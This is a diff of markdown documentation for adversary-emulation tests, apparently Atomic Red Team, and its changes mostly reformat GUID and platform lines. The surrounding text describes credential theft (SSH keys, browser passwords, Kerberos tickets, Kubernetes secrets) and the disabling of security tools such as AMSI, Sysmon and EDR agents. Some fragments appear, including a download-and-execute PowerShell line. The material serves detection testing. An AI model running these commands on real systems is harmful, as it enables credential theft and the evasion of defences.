## Atomic Test #1 - Search Through Bash History - -auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce - Search through bash history for specifice commands we want to capture + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3cfde62b-7c33-4b26-a61e-755d6131c8ce + + + #### Inputs: diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index 2f1e6642..8780b653 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -22,14 +22,16 @@ Some private keys require a password or passphrase for operation, so an adversar
## Atomic Test #1 - Private Keys - -auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696 - Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc + **Supported Platforms:** Windows +**auto_generated_guid:** 520ce462-7ca7-441e-b5a5-f8347f632696 + + + @@ -49,13 +51,15 @@ dir c:\ /b /s .key | findstr /e .key
## Atomic Test #2 - Discover Private SSH Keys - -auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 - Discover private SSH keys on a macOS or Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878 + + + #### Inputs: @@ -86,13 +90,15 @@ rm #{output_file}
## Atomic Test #3 - Copy Private SSH Keys with CP - -auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 - Copy private SSH keys on a Linux system to a staging folder using the `cp` command. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c247dc7-5128-4643-907b-73a76d9135c3 + + + #### Inputs: @@ -124,13 +130,15 @@ rm #{output_folder}
## Atomic Test #4 - Copy Private SSH Keys with rsync - -auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a - Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 864bb0b2-6bb5-489a-b43b-a77b3a16d68a + + + #### Inputs: diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md index dbbe2d71..718e21a9 100644 --- a/atomics/T1552.006/T1552.006.md +++ b/atomics/T1552.006/T1552.006.md @@ -23,13 +23,15 @@ On the SYSVOL share, adversaries may use the following command to enumerate pote
## Atomic Test #1 - GPP Passwords (findstr) - -auto_generated_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. + **Supported Platforms:** Windows +**auto_generated_guid:** 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f + + + @@ -61,17 +63,19 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - GPP Passwords (Get-GPPPassword) - -auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". + **Supported Platforms:** Windows +**auto_generated_guid:** e9584f82-322c-474a-b831-940fd8b4455c + + + #### Inputs: diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index d0d3f03b..9bcf155c 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -14,13 +14,15 @@ An adversary may access the Docker API to collect logs that contain credentials
## Atomic Test #1 - ListSecrets - -auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get secrets -n #{namespace}
## Atomic Test #2 - Cat the contents of a Kubernetes service account token file - -auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f - Access the Kubernetes service account access token stored within a container in a cluster. + **Supported Platforms:** Linux +**auto_generated_guid:** 788e0019-a483-45da-bcfe-96353d46820f + + + diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md index 380c0107..82a30cb0 100644 --- a/atomics/T1553.001/T1553.001.md +++ b/atomics/T1553.001/T1553.001.md @@ -14,13 +14,15 @@ In typical operation, a file will be downloaded from the internet and given a qu
## Atomic Test #1 - Gatekeeper Bypass - -auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b - Gatekeeper Bypass via command line + **Supported Platforms:** macOS +**auto_generated_guid:** fb3d46c6-9480-4803-8d7d-ce676e1f1a9b + + + #### Inputs: diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 182abaad..c1386bca 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -26,13 +26,15 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -
## Atomic Test #1 - Install root CA on CentOS/RHEL - -auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 9c096ec4-fd42-419d-a762-d64cc950627e + + + #### Inputs: @@ -67,13 +69,15 @@ fi
## Atomic Test #2 - Install root CA on Debian/Ubuntu - -auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 53bcf8a0-1549-4b85-b919-010c56d724ff + + + #### Inputs: @@ -113,13 +117,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #3 - Install root CA on macOS - -auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 - Creates a root CA with openssl + **Supported Platforms:** macOS +**auto_generated_guid:** cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 + + + #### Inputs: @@ -158,13 +164,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #4 - Install root CA on Windows - -auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 - Creates a root CA with Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 76f49d86-5eb1-461a-a032-a480f86652f1 + + + #### Inputs: @@ -215,13 +223,15 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
## Atomic Test #5 - Install root CA on Windows with certutil - -auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f - Creates a root CA with certutil + **Supported Platforms:** Windows +**auto_generated_guid:** 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f + + + #### Inputs: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index fc2bed9c..805a501a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -14,13 +14,15 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
## Atomic Test #1 - Mount ISO image - -auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa - Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + **Supported Platforms:** Windows +**auto_generated_guid:** 002cca30-4778-4891-878a-aaffcfa502fa + + + #### Inputs: @@ -62,15 +64,17 @@ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/
## Atomic Test #2 - Mount an ISO image and run executable from the ISO - -auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc - Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + **Supported Platforms:** Windows +**auto_generated_guid:** 42f22b00-0242-4afc-a61b-0da05041f9cc + + + #### Inputs: diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md index bdc572de..76b62aaf 100644 --- a/atomics/T1555.001/T1555.001.md +++ b/atomics/T1555.001/T1555.001.md @@ -12,9 +12,6 @@ To manage their credentials, users have to use additional credentials to access
## Atomic Test #1 - Keychain - -auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 - ### Keychain Files ~/Library/Keychains/ @@ -26,9 +23,14 @@ auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) [Keychain dumper](https://github.com/juuso/keychaindump) + **Supported Platforms:** macOS +**auto_generated_guid:** 1864fdec-ff86-4452-8c30-f12507582a93 + + + #### Inputs: diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index b460c84c..d780ed3d 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,17 +22,19 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
## Atomic Test #1 - Run Chrome-password Collector - -auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622 - A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** 8c05b133-d438-47ca-a630-19cc464c4622 + + + #### Inputs: @@ -77,15 +79,17 @@ Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
## Atomic Test #2 - Search macOS Safari Cookies - -auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b - This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. + **Supported Platforms:** macOS +**auto_generated_guid:** c1402f7b-67ca-43a8-b5f3-3143abedc01b + + + #### Inputs: @@ -111,14 +115,16 @@ grep -q "#{search_string}" "Cookies.binarycookies"
## Atomic Test #3 - LaZagne - Credentials from Browser - -auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014 - The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9a2915b3-3954-4cce-8c76-00fbf4dbd014 + + + #### Inputs: diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 3e333580..24135db4 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Extract Windows Credential Manager via VBA - -auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b - This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + + + @@ -64,13 +66,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] - -auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3 + + + @@ -90,13 +94,15 @@ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] - -auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240 + + + diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md index 807c98bc..19efee24 100644 --- a/atomics/T1556.002/T1556.002.md +++ b/atomics/T1556.002/T1556.002.md @@ -14,13 +14,15 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL - -auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c - Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. + **Supported Platforms:** Windows +**auto_generated_guid:** a7961770-beb5-4134-9674-83d7e1fa865c + + + #### Inputs: diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md index ba58dac9..c08b28e8 100644 --- a/atomics/T1558.001/T1558.001.md +++ b/atomics/T1558.001/T1558.001.md @@ -14,15 +14,17 @@ The KDC service runs all on domain controllers that are part of an Active Direct
## Atomic Test #1 - Crafting golden tickets with mimikatz - -auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af - Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + **Supported Platforms:** Windows +**auto_generated_guid:** 9726592a-dabc-4d4d-81cd-44070008b3af + + + #### Inputs: diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index c33a6ec5..a3155891 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -18,18 +18,20 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
## Atomic Test #1 - Request for service tickets - -auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a - This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output + **Supported Platforms:** Windows +**auto_generated_guid:** 3f987809-3681-43c8-bcd8-b3ff3a28533a + + + diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md index 1e38d8cb..e7a4580a 100644 --- a/atomics/T1559.002/T1559.002.md +++ b/atomics/T1559.002/T1559.002.md @@ -18,13 +18,15 @@ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePos
## Atomic Test #1 - Execute Commands - -auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd - Executes commands via DDE using Microsfot Word + **Supported Platforms:** Windows +**auto_generated_guid:** f592ba2a-e9e8-4d62-a459-ef63abd819fd + + + #### Run it with these steps! @@ -50,13 +52,15 @@ The Field Code should now be displayed, change it to Contain the following:
## Atomic Test #2 - Execute PowerShell script via Word DDE - -auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 - When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script + **Supported Platforms:** Windows +**auto_generated_guid:** 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 + + + @@ -76,9 +80,6 @@ start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
## Atomic Test #3 - DDEAUTO - -auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 - TrustedSec - Unicorn - https://github.com/trustedsec/unicorn SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ @@ -86,9 +87,14 @@ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-mswo Word VBA Macro [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) + **Supported Platforms:** Windows +**auto_generated_guid:** cf91174c-4e74-414e-bec0-8d60a104d181 + + + #### Run it with these steps! diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 17ca1c97..a376ff85 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -26,14 +26,16 @@ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS o
## Atomic Test #1 - Compress Data for Exfiltration With Rar - -auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory + **Supported Platforms:** Windows +**auto_generated_guid:** 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 + + + #### Inputs: @@ -80,14 +82,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar - -auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c - Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) + **Supported Platforms:** Windows +**auto_generated_guid:** 8dd61a55-44c6-43cc-af0c-8bdda276860c + + + #### Inputs: @@ -131,14 +135,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip - -auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 - Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) + **Supported Platforms:** Windows +**auto_generated_guid:** 01df0353-d531-408d-a0c5-3161bf822134 + + + #### Inputs: @@ -185,13 +191,15 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip - -auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 - Note: Requires 7zip installation + **Supported Platforms:** Windows +**auto_generated_guid:** d1334303-59cb-4a03-8313-b3e24d02c198 + + + #### Inputs: @@ -235,13 +243,15 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.
## Atomic Test #5 - Data Compressed - nix - zip - -auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c51cec55-28dd-4ad2-9461-1eacbc82c3a0 + + + #### Inputs: @@ -283,13 +293,15 @@ echo Please set input_files argument to include files that exist
## Atomic Test #6 - Data Compressed - nix - gzip Single File - -auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af + + + #### Inputs: @@ -319,13 +331,15 @@ rm -f #{input_file}.gz
## Atomic Test #7 - Data Compressed - nix - tar Folder or File - -auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a + + + #### Inputs: @@ -367,13 +381,15 @@ echo Please set input_file_folder argument to a folder that exists
## Atomic Test #8 - Data Encrypted with zip and gpg symmetric - -auto_generated_guid: 0286eb44-e7ce-41a0-b109-3da516e05a5f - Encrypt data for exiltration + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f + + + #### Inputs: diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md index 8cd45ba7..4f4895dc 100644 --- a/atomics/T1560.002/T1560.002.md +++ b/atomics/T1560.002/T1560.002.md @@ -18,13 +18,15 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and
## Atomic Test #1 - Compressing data using GZip in Python (Linux) - -auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 - Uses GZip from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8 + + + #### Inputs: @@ -66,13 +68,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #2 - Compressing data using bz2 in Python (Linux) - -auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d - Uses bz2 from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d + + + #### Inputs: @@ -114,13 +118,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #3 - Compressing data using zipfile in Python (Linux) - -auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 - Uses zipfile from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0 + + + #### Inputs: @@ -162,13 +168,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #4 - Compressing data using tarfile in Python (Linux) - -auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db - Uses tarfile from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db + + + #### Inputs: diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md index 7c1e6f91..2200cf0c 100644 --- a/atomics/T1560/T1560.md +++ b/atomics/T1560/T1560.md @@ -12,14 +12,16 @@ Both compression and encryption are done prior to exfiltration, and can be perfo
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell - -auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory + **Supported Platforms:** Windows +**auto_generated_guid:** 41410c60-614d-4b9d-b66e-b0192dd9c597 + + + #### Inputs: diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index 4681b94f..ba2e2af9 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -56,13 +56,15 @@
## Atomic Test #1 - Disable syslog - -auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 - Disables syslog collection + **Supported Platforms:** Linux +**auto_generated_guid:** 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 + + + #### Inputs: @@ -106,13 +108,15 @@ sudo #{package_installer}
## Atomic Test #2 - Disable Cb Response - -auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 - Disable the Cb Response service + **Supported Platforms:** Linux +**auto_generated_guid:** ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 + + + @@ -139,13 +143,15 @@ fi
## Atomic Test #3 - Disable SELinux - -auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 - Disables SELinux enforcement + **Supported Platforms:** Linux +**auto_generated_guid:** fc225f36-9279-4c39-b3f9-5141ab74f8d8 + + + @@ -169,13 +175,15 @@ setenforce 1
## Atomic Test #4 - Stop Crowdstrike Falcon on Linux - -auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d - Stop and disable Crowdstrike Falcon on Linux + **Supported Platforms:** Linux +**auto_generated_guid:** 828a1278-81cc-4802-96ab-188bf29ca77d + + + @@ -201,13 +209,15 @@ sudo systemctl start falcon-sensor.service
## Atomic Test #5 - Disable Carbon Black Response - -auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c - Disables Carbon Black Response + **Supported Platforms:** macOS +**auto_generated_guid:** 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c + + + @@ -233,13 +243,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.pli
## Atomic Test #6 - Disable LittleSnitch - -auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 - Disables LittleSnitch + **Supported Platforms:** macOS +**auto_generated_guid:** 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 + + + @@ -263,13 +275,15 @@ sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
## Atomic Test #7 - Disable OpenDNS Umbrella - -auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 - Disables OpenDNS Umbrella + **Supported Platforms:** macOS +**auto_generated_guid:** 07f43b33-1e15-4e99-be70-bc094157c849 + + + @@ -293,13 +307,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfi
## Atomic Test #8 - Disable macOS Gatekeeper - -auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 - Disables macOS Gatekeeper + **Supported Platforms:** macOS +**auto_generated_guid:** 2a821573-fb3f-4e71-92c3-daac7432f053 + + + @@ -323,13 +339,15 @@ sudo spctl --master-enable
## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS - -auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef - Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS + **Supported Platforms:** macOS +**auto_generated_guid:** b3e7510c-2d4c-4249-a33f-591a2bc83eef + + + #### Inputs: @@ -361,14 +379,16 @@ sudo launchctl load -w #{userdaemon_plist}
## Atomic Test #10 - Unload Sysmon Filter Driver - -auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164 - Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". + **Supported Platforms:** Windows +**auto_generated_guid:** 811b3e76-c41b-430c-ac0d-e2380bfaa164 + + + #### Inputs: @@ -434,13 +454,15 @@ sysmon -accepteula -i
## Atomic Test #11 - Uninstall Sysmon - -auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc - Uninstall Sysinternals Sysmon for Defense Evasion + **Supported Platforms:** Windows +**auto_generated_guid:** a316fb2e-5344-470d-91c1-23e15c374edc + + + #### Inputs: @@ -494,16 +516,18 @@ cmd /c sysmon -i -accepteula
## Atomic Test #12 - AMSI Bypass - AMSI InitFailed - -auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd - Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ + **Supported Platforms:** Windows +**auto_generated_guid:** 695eed40-e949-40e5-b306-b4031e4154bd + + + @@ -527,15 +551,17 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key - -auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b - With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone. + **Supported Platforms:** Windows +**auto_generated_guid:** 13f09b91-c953-438e-845b-b585e51cac9b + + + @@ -559,15 +585,17 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #14 - Disable Arbitrary Security Windows Service - -auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5 - With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService" + **Supported Platforms:** Windows +**auto_generated_guid:** a1230893-56ac-4c81-b644-2108e982f8f5 + + + #### Inputs: @@ -598,14 +626,16 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell - -auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7 - Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b8df440-51ec-4d53-bf83-899591c9b5d7 + + + @@ -635,15 +665,17 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
